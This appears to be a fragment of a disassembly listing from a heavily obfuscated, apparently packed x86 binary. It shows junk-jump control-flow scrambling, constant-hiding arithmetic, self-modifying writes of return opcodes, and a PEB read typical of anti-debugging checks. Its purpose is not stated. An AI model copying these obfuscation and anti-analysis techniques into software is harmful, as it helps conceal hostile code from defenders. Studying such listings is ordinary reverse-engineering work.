		sub	ebp, ebx
		jmp	sub_454210
; ---------------------------------------------------------------------------

loc_44A19F:				; DATA XREF: sub_447832+14254o
		xchg	edi, [esp]
		jmp	loc_43E504
; ---------------------------------------------------------------------------
		db 89h
		db 5
off_44A1A9	dd offset dword_41E0FC	; DATA XREF: sub_447832:loc_45BA80o
; ---------------------------------------------------------------------------
		lea	eax, nullsub_394
		mov	byte ptr [eax],	0C3h

loc_44A1B6:				; CODE XREF: y2kk37jd:00448632j
		jmp	loc_45B9DF
; ---------------------------------------------------------------------------

loc_44A1BB:				; CODE XREF: y2kk37jd:loc_44706Ej
					; y2kk37jd:0045973Aj
		xor	eax, 60DA1DAEh
		add	eax, ebp
		add	eax, 0DB0F3CDDh
		mov	eax, [eax]
		popf
		mov	eax, [eax]
		jmp	loc_44DDC3
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_510. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4507BF

loc_44A1D4:				; CODE XREF: sub_4507BF:loc_447BCDj
		cmp	dword ptr [ebp-10Ch], 36343831h
		jnz	loc_441A41
		jmp	loc_44C176
; END OF FUNCTION CHUNK	FOR sub_4507BF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447041

loc_44A1E9:				; CODE XREF: sub_447041+7j
		mov	edx, ebp
		xchg	edx, [esp+4+var_4]
		mov	ebp, esp
		push	ebp
		jmp	loc_44D2A8
; END OF FUNCTION CHUNK	FOR sub_447041
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44FA88

loc_44A1F6:				; CODE XREF: sub_44FA88:loc_45A7D7j
		call	sub_4568B4
; END OF FUNCTION CHUNK	FOR sub_44FA88
; START	OF FUNCTION CHUNK FOR sub_445226

loc_44A1FB:				; CODE XREF: sub_445226+151D3j
		jnp	loc_43C239

loc_44A201:				; CODE XREF: sub_445226:loc_446CFBj
		push	0BF7D4624h
		pop	eax
		sub	eax, 0C4056AECh
		jmp	loc_453400
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44289F

loc_44A212:				; CODE XREF: sub_44289F+12F22j
		jns	loc_45A65A
		cdq
		push	ecx
		jmp	loc_459F87
; END OF FUNCTION CHUNK	FOR sub_44289F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45ADEC

loc_44A21F:				; CODE XREF: sub_45ADEC-14A75j
		sub	al, 99h
		push	0C64CE0D6h
		pop	edx
		or	edx, 5206390Fh
		sub	edx, 0EEB059D1h
		jmp	loc_458294
; END OF FUNCTION CHUNK	FOR sub_45ADEC
; ---------------------------------------------------------------------------
		cmp	ebp, 518EFB34h
		jmp	loc_43F01D
; ---------------------------------------------------------------------------

loc_44A243:				; CODE XREF: y2kk37jd:004559FBj
		xor	edi, 7BA9158h

loc_44A249:				; CODE XREF: y2kk37jd:loc_4559E5j
		add	esi, 8F32B116h
		push	offset sub_446E19
		jmp	locret_45826D
; ---------------------------------------------------------------------------

loc_44A259:				; DATA XREF: sub_44B03F:loc_43E22Fo
		xchg	edx, [esp]
		mov	esi, edx
		pop	edx
		and	esi, 24D3FBC3h
		add	esi, 0FAA75FD5h
		add	esi, ebp
		add	esi, 5553825h
		jmp	loc_447EC7
; ---------------------------------------------------------------------------

loc_44A278:				; CODE XREF: y2kk37jd:00452526j
		add	ebx, 34154081h
		or	eax, 3CE718FCh
		mov	[ecx], eax
		xchg	ebp, edi
; START	OF FUNCTION CHUNK FOR sub_443BAF

loc_44A288:				; CODE XREF: sub_443BAF:loc_452519j
		add	ebx, 59BD7989h
		call	sub_459F98

loc_44A293:				; CODE XREF: y2kk37jd:0044BC21j
		jmp	loc_452D40
; END OF FUNCTION CHUNK	FOR sub_443BAF

; =============== S U B	R O U T	I N E =======================================



sub_44A298	proc near		; CODE XREF: sub_43F8B8:loc_446194p
					; y2kk37jd:0045ADBEj

arg_8		= dword	ptr  0Ch

; FUNCTION CHUNK AT 00441AA6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447CD0 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00448693 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00448F2B SIZE 0000002A BYTES
; FUNCTION CHUNK AT 0044AB87 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044D0C6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004529A8 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00457884 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A6F9 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0045C719 SIZE 0000001C BYTES

		xchg	eax, [esp+0]
		pop	eax
		push	edx
		push	0F4AE910h
		pop	edx
		add	edx, 0D64873CAh
		sub	edx, 6DEEA150h
		jmp	loc_44AB87
sub_44A298	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_254. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4415B8

loc_44A2B5:				; CODE XREF: sub_4415B8+18371j
		jmp	loc_443C71
; END OF FUNCTION CHUNK	FOR sub_4415B8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A3F8

loc_44A2BA:				; CODE XREF: sub_44A3F8+Dj
		jmp	loc_454D76
; END OF FUNCTION CHUNK	FOR sub_44A3F8
; ---------------------------------------------------------------------------
		sub	ebp, 2327E7Bh
		jmp	sub_45BE7D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44001E

loc_44A2CA:				; CODE XREF: sub_44001E+175A1j
		adc	ecx, esi
		sbb	ebp, edi
		or	esi, edi
		shl	edi, 0Fh
		jmp	loc_4401F3
; END OF FUNCTION CHUNK	FOR sub_44001E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B583

loc_44A2D8:				; CODE XREF: sub_45B583-12604j
		not	ebx

loc_44A2DA:				; CODE XREF: sub_45B583:loc_45BA90j
		pop	ecx
		push	offset loc_44EE36
		jmp	loc_450885
; END OF FUNCTION CHUNK	FOR sub_45B583
; ---------------------------------------------------------------------------

locret_44A2E5:				; CODE XREF: y2kk37jd:0044BD1Aj
		retn
; ---------------------------------------------------------------------------

loc_44A2E6:				; CODE XREF: y2kk37jd:004404FCj
		jmp	loc_44B144
; ---------------------------------------------------------------------------

loc_44A2EB:				; CODE XREF: y2kk37jd:0045B55Ej
		xor	eax, 0BF90CA8Bh
		call	sub_458681
		mov	[ebp-8], eax
		call	sub_43BF88
		and	eax, ebx
		jmp	loc_451787
; ---------------------------------------------------------------------------

loc_44A305:				; DATA XREF: sub_453583:loc_442277o
		xchg	ebx, [esp]
		push	ebx
		push	58E297F3h
		pop	ebx
		jmp	loc_44D639
; ---------------------------------------------------------------------------

loc_44A314:				; CODE XREF: y2kk37jd:004432B2j
		rol	ebp, 0Fh

; =============== S U B	R O U T	I N E =======================================



sub_44A317	proc near		; CODE XREF: sub_451854-C06Dp

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0044941C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B909 SIZE 00000014 BYTES

		xchg	edi, [esp+0]
		pop	edi
		push	819BC95Fh
		pop	ecx
		jmp	loc_45B909
sub_44A317	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_44A326	proc near		; DATA XREF: y2kk37jd:0045C072o

; FUNCTION CHUNK AT 00458B74 SIZE 0000000B BYTES

		xchg	esi, [esp+0]
		call	sub_44803E

loc_44A32E:				; DATA XREF: sub_4536F2+13o
		or	eax, eax
		jnz	loc_443B4E
		jmp	loc_458B74
sub_44A326	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_300. PRESS KEYPAD	"+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_44A33C	proc near		; CODE XREF: y2kk37jd:004489A6j
					; sub_44704D+3C00p

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043B660 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0043C787 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00441006 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446A4C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B065 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0044C6DC SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044D152 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044D458 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044EA35 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453891 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 004538DC SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0045AF47 SIZE 00000018 BYTES

		xchg	esi, [esp+0]
		pop	esi
		mov	eax, [ebp-4]
		call	sub_458C2B

loc_44A348:				; CODE XREF: sub_4552EB-23B6j
		jmp	loc_44D458
sub_44A33C	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		db 3Bh,	0D9h, 0E9h
		dd 0FFFFF40Bh
; ---------------------------------------------------------------------------

loc_44A354:				; CODE XREF: y2kk37jd:loc_453EB9j
		push	edx
		push	315C2A55h
		pop	edx
		xor	edx, 125617CDh
		or	edx, ds:4000F0h
		rol	edx, 3
		add	edx, 23C62AD2h
		xchg	edx, [esp]
		jmp	loc_44A7F6
; ---------------------------------------------------------------------------

loc_44A378:				; CODE XREF: y2kk37jd:00457A81j
		mov	eax, 32FE4135h
		call	sub_442C3E
		mov	ds:dword_41E170, eax
		lea	eax, nullsub_508
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_508
; ---------------------------------------------------------------------------
		pop	edx
		mov	eax, [esp]
		push	edi
		jmp	loc_4501BC
; ---------------------------------------------------------------------------

locret_44A3A0:				; CODE XREF: y2kk37jd:00455837j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F2F2

loc_44A3A1:				; CODE XREF: sub_43F2F2+4F73j
		jmp	loc_43F035
; END OF FUNCTION CHUNK	FOR sub_43F2F2
; ---------------------------------------------------------------------------
		mov	ds:dword_41E19C, eax
		lea	eax, nullsub_433
		mov	byte ptr [eax],	0C3h
		jmp	loc_4457EC
; ---------------------------------------------------------------------------
		xchg	esi, [esp]
		mov	edx, esi
		jmp	loc_43D4AF
; ---------------------------------------------------------------------------

loc_44A3C4:				; CODE XREF: y2kk37jd:loc_43FCC2j
		lea	eax, sub_4443CD
		mov	byte ptr [eax],	0C3h
		jmp	sub_4443CD

; =============== S U B	R O U T	I N E =======================================



sub_44A3D2	proc near		; CODE XREF: sub_414C86+8p
					; sub_44A3D2+5j
					; DATA XREF: ...
		call	sub_44A3E7
		jmp	ds:off_41E094
sub_44A3D2	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_44A3DD:				; CODE XREF: sub_445226-70BFj
		jmp	loc_444E69
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442376

loc_44A3E2:				; CODE XREF: sub_442376-4557j
		jmp	loc_43CA61
; END OF FUNCTION CHUNK	FOR sub_442376

; =============== S U B	R O U T	I N E =======================================



sub_44A3E7	proc near		; CODE XREF: sub_44A3D2p
					; sub_4496C2+1D3Ej ...

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043FC77 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00455192 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0045C26D SIZE 0000000A BYTES

		pop	edx
		jns	loc_45C26D
		push	offset sub_4420D3
		jmp	nullsub_59
sub_44A3E7	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_44A3F8	proc near		; CODE XREF: sub_444D46+Fj

arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch

; FUNCTION CHUNK AT 0044A2BA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454D76 SIZE 00000009 BYTES

		push	ebx
		pop	eax
		pop	ebx
		pop	edx
		xchg	esi, [esp-8+arg_4]
		mov	ecx, esi
		pop	esi
		xchg	edx, [esp-0Ch+arg_8]
		jmp	loc_44A2BA
sub_44A3F8	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AFF6

loc_44A40A:				; CODE XREF: sub_44AFF6+2C28j
		jle	loc_44CB0D
		and	ebp, 0A696BE59h
		test	ecx, 0A650E29Eh
		jmp	loc_43C933
; END OF FUNCTION CHUNK	FOR sub_44AFF6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4490B4

loc_44A421:				; CODE XREF: sub_4490B4-D27Ej
		add	edi, 21C81CB6h
		mov	[edi], eax
		pop	edi
		push	2
		push	ecx
		jmp	loc_4529A3
; END OF FUNCTION CHUNK	FOR sub_4490B4
; ---------------------------------------------------------------------------

loc_44A432:				; CODE XREF: y2kk37jd:loc_44C989j
		push	0C4F7E732h
		call	sub_4580F2
; START	OF FUNCTION CHUNK FOR sub_445568

loc_44A43C:				; CODE XREF: sub_445568+106A2j
		cmp	esi, eax
		jmp	loc_44DEC5
; END OF FUNCTION CHUNK	FOR sub_445568
; ---------------------------------------------------------------------------

loc_44A443:				; DATA XREF: sub_45220C+3o
		push	edx
		push	edx
		push	9B2B35A8h
		pop	edx
		xor	edx, 0FDB05BA0h
		jmp	loc_45C38F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CEAB

loc_44A456:				; CODE XREF: sub_44CEAB-F170j
		add	edi, 69AFACB4h
		xchg	edi, [esp+4+var_4]
		jmp	sub_4424B0
; END OF FUNCTION CHUNK	FOR sub_44CEAB
; ---------------------------------------------------------------------------

loc_44A464:				; DATA XREF: sub_43D5C1:loc_452437o
		add	edx, ebp
		add	edx, 0FE528A11h
		mov	[edx], eax
		pop	edx
		jmp	loc_43EB27
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F770

loc_44A474:				; CODE XREF: sub_43F770:loc_447204j
		jo	loc_45B503
		jz	loc_4417E7
		sub	edx, 2544EE92h
		jmp	loc_45B349
; END OF FUNCTION CHUNK	FOR sub_43F770

; =============== S U B	R O U T	I N E =======================================



sub_44A48B	proc near		; CODE XREF: y2kk37jd:0045ABC6j
					; sub_452441:loc_45C533p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00447C64 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457997 SIZE 00000025 BYTES

		xchg	eax, [esp+0]
		pop	eax
		xchg	eax, [esp-4+arg_0]
		call	sub_45AAD1
		push	0A7E21703h
		pop	eax
		jmp	loc_447C64
sub_44A48B	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_517. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F75D

loc_44A4A3:				; CODE XREF: sub_43F75D+1521Dj
		jmp	loc_450AC5
; END OF FUNCTION CHUNK	FOR sub_43F75D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FDE6

loc_44A4A8:				; CODE XREF: sub_43FDE6+7j
		jmp	loc_44557B
; END OF FUNCTION CHUNK	FOR sub_43FDE6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AAF1

loc_44A4AD:				; CODE XREF: sub_45AAF1+10j
		pop	esi
		or	eax, 1B72D4FBh
		add	eax, 89263CC9h
		push	esi
		pushf
		push	14338040h
		pop	esi
		and	esi, 9B74852Eh
		jmp	loc_4522C7
; END OF FUNCTION CHUNK	FOR sub_45AAF1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4507BF

loc_44A4CD:				; CODE XREF: sub_4507BF-AD0Dj
		jz	loc_45173A
		jmp	loc_453137
; END OF FUNCTION CHUNK	FOR sub_4507BF
; ---------------------------------------------------------------------------

loc_44A4D8:				; CODE XREF: y2kk37jd:loc_4496B6j
		sub	edi, 39A838C7h
		add	edi, ds:4000E8h
		xor	edi, 0E7217F4Ch
		add	edi, 0AE3521C3h
		mov	[edi], eax
		pop	edi
		retn
; ---------------------------------------------------------------------------

loc_44A4F4:				; CODE XREF: y2kk37jd:00442A2Bj
		jmp	loc_43EF88
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_271. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44001E

loc_44A4FA:				; CODE XREF: sub_44001E+8C7Ej
		jmp	loc_4472BA
; END OF FUNCTION CHUNK	FOR sub_44001E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A6B5

loc_44A4FF:				; CODE XREF: sub_44A6B5+Bj
		rol	eax, 9
		push	eax
		call	sub_4526B7
		jmp	loc_452E9B
; END OF FUNCTION CHUNK	FOR sub_44A6B5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4564EB

loc_44A50D:				; CODE XREF: sub_4564EB:loc_45C088j
		jz	loc_445079
		jmp	loc_43BA61
; END OF FUNCTION CHUNK	FOR sub_4564EB
; ---------------------------------------------------------------------------
		or	esi, eax
		jmp	loc_444EDC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443831

loc_44A51F:				; CODE XREF: sub_443831:loc_45A576j
		jnz	loc_458F62
		jmp	loc_43F3DE
; END OF FUNCTION CHUNK	FOR sub_443831
; ---------------------------------------------------------------------------
		mov	ds:off_41E1EC, eax
		lea	eax, loc_456839
		mov	byte ptr [eax],	0C3h
		jmp	loc_444F39

; =============== S U B	R O U T	I N E =======================================



sub_44A53E	proc near		; CODE XREF: sub_4198C0+3Cp
					; sub_4198C0+43p ...

; FUNCTION CHUNK AT 0044F07B SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044F9A6 SIZE 00000005 BYTES

		call	sub_44F086
		jmp	loc_44F9A6
sub_44A53E	endp

; ---------------------------------------------------------------------------

locret_44A548:				; CODE XREF: y2kk37jd:0044DFA3j
		retn
; ---------------------------------------------------------------------------

loc_44A549:				; CODE XREF: y2kk37jd:loc_45755Ej
		jmp	loc_451E5E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454D0F

loc_44A54E:				; CODE XREF: sub_454D0F-17E4j
		jmp	loc_459639
; END OF FUNCTION CHUNK	FOR sub_454D0F
; ---------------------------------------------------------------------------

loc_44A553:				; CODE XREF: y2kk37jd:0044C44Ej
		jmp	sub_454B84
; ---------------------------------------------------------------------------

loc_44A558:				; CODE XREF: y2kk37jd:0044757Fj
		ror	edx, 0Dh
		sub	ecx, 89D7C39Dh
; START	OF FUNCTION CHUNK FOR sub_43BD0D

loc_44A561:				; CODE XREF: sub_43BD0D+B851j
		xor	eax, 0D272BCEEh
		add	eax, 60ADE49Dh
		call	sub_442C3E
		mov	ds:off_41E1B0, eax
		jmp	loc_456568
; END OF FUNCTION CHUNK	FOR sub_43BD0D

; =============== S U B	R O U T	I N E =======================================



sub_44A57D	proc near		; CODE XREF: y2kk37jd:0043D5E1j
					; y2kk37jd:0045C3DEp

; FUNCTION CHUNK AT 0043B995 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045BFFD SIZE 0000001D BYTES

		xchg	eax, [esp+0]
		pop	eax
		push	ecx
		push	0B480739Bh
		pop	ecx
		or	ecx, 0FE33AF91h
		jmp	loc_43B995
sub_44A57D	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4408B9

loc_44A593:				; CODE XREF: sub_4408B9:loc_454C86j
		push	5D086CFCh
		pop	edi
		sub	edi, 3AFC374Bh
		xor	edi, 8D4B9CDFh
		jmp	loc_453B06
; END OF FUNCTION CHUNK	FOR sub_4408B9
; ---------------------------------------------------------------------------

loc_44A5AA:				; DATA XREF: sub_44FB6D:loc_44D013o
		inc	ds:dword_446608
		lea	eax, nullsub_21
		mov	byte ptr [eax],	0C3h
		push	eax
		push	0F65CFF90h
		pop	eax
		jmp	loc_44DBE1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C46D

loc_44A5C5:				; CODE XREF: sub_43C46D:loc_441218j
		xchg	ecx, edx
		or	ebp, 0F181C70h
		pop	edi
		jmp	loc_43E50E
; END OF FUNCTION CHUNK	FOR sub_43C46D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449C4F

loc_44A5D3:				; CODE XREF: y2kk37jd:loc_45224Bj
					; sub_449C4F:loc_45625Cj
		jz	loc_43E351
		jmp	loc_443CE5
; END OF FUNCTION CHUNK	FOR sub_449C4F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454C24

loc_44A5DE:				; CODE XREF: y2kk37jd:0043E7DCj
					; sub_454C24-12C93j
		or	edi, 0EB6535C4h
		cmp	edi, 57275BD0h
		jmp	loc_44B1A5
; END OF FUNCTION CHUNK	FOR sub_454C24
; ---------------------------------------------------------------------------

loc_44A5EF:				; CODE XREF: y2kk37jd:0044A9D0j
		add	edi, 0FB102385h
		or	edi, 402D0A88h
		add	edi, 219261E5h
		mov	[edi], eax
		pop	edi
		lea	eax, nullsub_181
		jmp	loc_45826E
; ---------------------------------------------------------------------------
		db 0E8h
		dd 0FFFF0FCFh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448CAE

loc_44A614:				; CODE XREF: sub_448CAE+53B8j
		jmp	loc_4489B1
; END OF FUNCTION CHUNK	FOR sub_448CAE
; ---------------------------------------------------------------------------

loc_44A619:				; CODE XREF: y2kk37jd:00447118j
		jmp	loc_44959C
; ---------------------------------------------------------------------------
		jle	loc_43C8EF
		jmp	sub_450857
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451711

loc_44A629:				; CODE XREF: sub_451711j
		xchg	ecx, [esp+0]
		mov	edx, ecx
		pop	ecx
		mov	eax, [esp-4+arg_0]
		jmp	loc_44304A
; END OF FUNCTION CHUNK	FOR sub_451711
; ---------------------------------------------------------------------------
		popf
		jmp	sub_448797
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440F0C

loc_44A63D:				; CODE XREF: sub_440F0C:loc_43D037j
		xor	esi, 767CE6DEh
		xor	eax, esi
		call	sub_450857

loc_44A64A:				; CODE XREF: sub_454433+422Cj
		jmp	sub_43E8DA
; END OF FUNCTION CHUNK	FOR sub_440F0C
; ---------------------------------------------------------------------------

loc_44A64F:				; CODE XREF: y2kk37jd:004581DEj
		js	loc_444563
		cmp	esi, 45AC2D7Ch
		jmp	loc_43CF72
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45689F

loc_44A660:				; CODE XREF: sub_45689F:loc_450C7Ej
		cdq
		jmp	loc_451E2E
; END OF FUNCTION CHUNK	FOR sub_45689F
; ---------------------------------------------------------------------------
		cdq
		jmp	sub_449129
; ---------------------------------------------------------------------------
		test	eax, ebp
		jmp	loc_43C3E0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F3F5

loc_44A673:				; CODE XREF: sub_44F3F5:loc_44E5DBj
		jge	loc_441C06
		and	esi, 0AB49F3A2h
		pop	esi
		jmp	loc_4562B2
; END OF FUNCTION CHUNK	FOR sub_44F3F5
; ---------------------------------------------------------------------------

loc_44A685:				; CODE XREF: y2kk37jd:0043F248j
		cdq
; START	OF FUNCTION CHUNK FOR sub_45B7AA

loc_44A686:				; CODE XREF: sub_45B7AA:loc_45730Fj
		add	ecx, 847031Ah
		xchg	ecx, [esp+0]
		jmp	loc_43BC4A
; END OF FUNCTION CHUNK	FOR sub_45B7AA
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_29. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_44A695:				; CODE XREF: sub_445226-68A1j
		jmp	sub_44BA42
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454539

loc_44A69A:				; CODE XREF: sub_454539-13E40j
		sub	eax, 0D01B42ABh
		jl	loc_44779C

loc_44A6A6:				; CODE XREF: sub_454539:loc_45953Bj
		call	sub_45405E
		call	sub_44493F
; END OF FUNCTION CHUNK	FOR sub_454539
; START	OF FUNCTION CHUNK FOR sub_44977F

loc_44A6B0:				; CODE XREF: sub_44977F+14j
		jmp	loc_44296A
; END OF FUNCTION CHUNK	FOR sub_44977F

; =============== S U B	R O U T	I N E =======================================



sub_44A6B5	proc near		; DATA XREF: y2kk37jd:0044C2A4o

; FUNCTION CHUNK AT 0043C0A0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447970 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 004483A4 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044A4FF SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044DFF4 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00452E9B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455D2D SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00459A8F SIZE 00000005 BYTES

		mov	esp, ebp
		pop	ebp
		mov	eax, ds:dword_446624
		or	eax, eax
		jnz	loc_44A4FF
		jmp	loc_43C0A0
sub_44A6B5	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

locret_44A6CB:				; CODE XREF: y2kk37jd:loc_43E85Aj
		retn
; ---------------------------------------------------------------------------
		rol	ebp, 1Dh
		jmp	sub_43FFF0
; ---------------------------------------------------------------------------

loc_44A6D4:				; CODE XREF: y2kk37jd:loc_4411B8j
		call	sub_45643D
; START	OF FUNCTION CHUNK FOR sub_445AD9

loc_44A6D9:				; CODE XREF: sub_445AD9+3j
		jmp	nullsub_12
; END OF FUNCTION CHUNK	FOR sub_445AD9
; ---------------------------------------------------------------------------
		sbb	ebp, 26533942h
		jmp	sub_458273

; =============== S U B	R O U T	I N E =======================================



sub_44A6E9	proc near		; DATA XREF: sub_444440o

; FUNCTION CHUNK AT 0043F17B SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004464DF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004488BD SIZE 0000001C BYTES

		push	ebx
		push	ecx
		mov	eax, large fs:30h
		call	sub_43B9FA

loc_44A6F7:				; CODE XREF: sub_45AAD1:loc_445A60j
		mov	eax, [ebp-4]
		mov	al, [eax]
		jns	loc_43F17B
		push	offset loc_43FB0F
		jmp	nullsub_61
sub_44A6E9	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BF31

loc_44A70C:				; CODE XREF: sub_43BF31:loc_43CFFBj
		jz	loc_43F933
; END OF FUNCTION CHUNK	FOR sub_43BF31
; START	OF FUNCTION CHUNK FOR sub_43F911

loc_44A712:				; CODE XREF: sub_43F911+DBF8j
		jmp	nullsub_74
; END OF FUNCTION CHUNK	FOR sub_43F911
; ---------------------------------------------------------------------------
		sbb	ecx, edx
		ror	ebp, 1Fh
		test	ecx, edx
		jmp	loc_43F92B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456809

loc_44A723:				; CODE XREF: sub_456809:loc_4505D6j
		push	4
		call	sub_447832
		push	ecx
		mov	ecx, eax
		xchg	ecx, [esp+8+var_8]
		call	sub_4490CB

loc_44A735:				; CODE XREF: sub_456809-2012j
		mov	eax, [ebp-80Ch]
		jmp	sub_457FCC
; END OF FUNCTION CHUNK	FOR sub_456809
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456D3F

loc_44A740:				; CODE XREF: sub_456D3F+4355j
		add	esi, 0C683CF89h

loc_44A746:				; CODE XREF: sub_456D3F:loc_45A324j
		mov	eax, [ebp-8]
		push	eax
		call	sub_44DB32
		jmp	loc_453AA7
; END OF FUNCTION CHUNK	FOR sub_456D3F
; ---------------------------------------------------------------------------

loc_44A754:				; CODE XREF: y2kk37jd:00443778j
		jns	loc_448F50
		jnb	sub_44E3B8
		jmp	loc_43DB3E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_44A765:				; CODE XREF: sub_4448E2+11E75j
		test	edx, esi
		jmp	loc_450943
; END OF FUNCTION CHUNK	FOR sub_4448E2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_289. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FC38

loc_44A76D:				; CODE XREF: sub_43FC38:loc_43FC97j
		and	ebx, 26432D2h
		or	ebx, 0F5D652ACh
		sub	ebx, 735A4064h
		add	ebx, 7BA83F1Bh
		xchg	ebx, [esp+4+var_4]
		jmp	sub_4581BB
; END OF FUNCTION CHUNK	FOR sub_43FC38
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44023C

loc_44A78D:				; CODE XREF: sub_44023C:loc_43B3BEj
		push	ecx
		mov	ecx, eax
		xchg	ecx, [esp+24h+var_24]
		lea	eax, loc_4413A7
		push	ecx
		mov	ecx, edi
		xchg	ecx, [esp+28h+var_28]
		jmp	loc_44AE81
; END OF FUNCTION CHUNK	FOR sub_44023C
; ---------------------------------------------------------------------------
		mov	eax, 20413B0Fh
		push	offset sub_45B02F
		jmp	loc_443AF8
; ---------------------------------------------------------------------------

loc_44A7B3:				; CODE XREF: y2kk37jd:00442618j
		rol	eax, 16h
		add	eax, 5230937Ah
		call	sub_442C3E
